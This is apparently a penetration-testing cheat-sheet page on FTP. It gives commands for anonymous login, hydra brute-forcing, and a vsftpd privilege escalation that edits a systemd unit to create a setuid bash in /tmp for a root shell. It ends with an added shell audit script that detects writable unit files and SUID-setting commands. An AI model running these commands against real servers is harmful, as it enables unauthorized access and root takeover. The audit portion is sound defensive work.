# FTP

## Anonymous Login

Some installations of FTP will allow anonymous logins.

```
ftp <victim_ip> 
anonymous:anonymous
```

### Brute Force

If the server enforces no maximum number of login attempts or a similar lockout, the login can simply be brute forced.

```
hydra -l admin -P wordlist.txt <victim_ip> -t 64 ftp
```

### Privilege Escalation - VSFTPD

If you can edit the vsftpd service file, you can get a root shell.

Modify the service file to run the following commands:

```
cp /bin/bash /tmp/root_shell
chmod +xs /tmp/root_shell
```

These commands copy `/bin/bash` to `/tmp/root_shell` and set the SUID bit on the copy, which allows us to execute the binary as its owner, i.e. root.

Edit the `/lib/systemd/system/vsftpd.service` file to contain the following code:

```ini
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/root_shell; chmod +xs /tmp/root_shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target
```

Once the `vsftpd.service` file is modified, reload the systemd daemon:

```
systemctl daemon-reload
```

Restart the service so that systemd runs the modified unit:

```
sudo /usr/sbin/service vsftpd restart
```

A new file, `root_shell`, should now be available inside the `/tmp` directory.

Use the file to spawn a root shell (`-p` keeps bash from dropping the effective UID):

```
/tmp/root_shell -p
```
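
The escalation above depends on a service unit file that a non-root user can write to, and it leaves a setuid binary in `/tmp`. The following audit functions check for both conditions; they are an added example, not part of the original page, and the function names, default directories and the `chmod` pattern are assumptions.

```shell
#!/bin/sh
# Added audit sketch (not from the original page). Default directories are
# assumptions; pass another directory as the first argument of each function.

# Unit files that group or other can write to: any such user can replace
# ExecStart and have systemd run the command as the unit's User=.
writable_units() {
    find "${1:-/lib/systemd/system}" -type f -name '*.service' \
        \( -perm -0020 -o -perm -0002 \) 2>/dev/null | sort
}

# Unit files whose Exec* lines call chmod with a setuid/setgid mode,
# e.g. "chmod +xs" or "chmod 4755". Heuristic pattern, commented lines skipped.
suid_setting_units() {
    find "${1:-/lib/systemd/system}" -type f -name '*.service' \
        -exec grep -lE \
        '^Exec[A-Za-z]*=.*chmod[[:space:]]+([ugoa]*\+[rwxXst]*s|[2467][0-7]{3})' \
        {} + 2>/dev/null | sort
}

# Setuid regular files inside a world-writable scratch directory.
suid_files() {
    find "${1:-/tmp}" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Print all findings when the script is run as: sh audit.sh report
if [ "${1:-}" = "report" ]; then
    echo "== writable unit files ==";        writable_units
    echo "== units that set SUID/SGID ==";   suid_setting_units
    echo "== setuid files in /tmp ==";       suid_files
fi
```

The mode-bit check does not cover unit files owned by a non-root account or writable through ACLs; review those with `ls -l` and `getfacl` as well.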
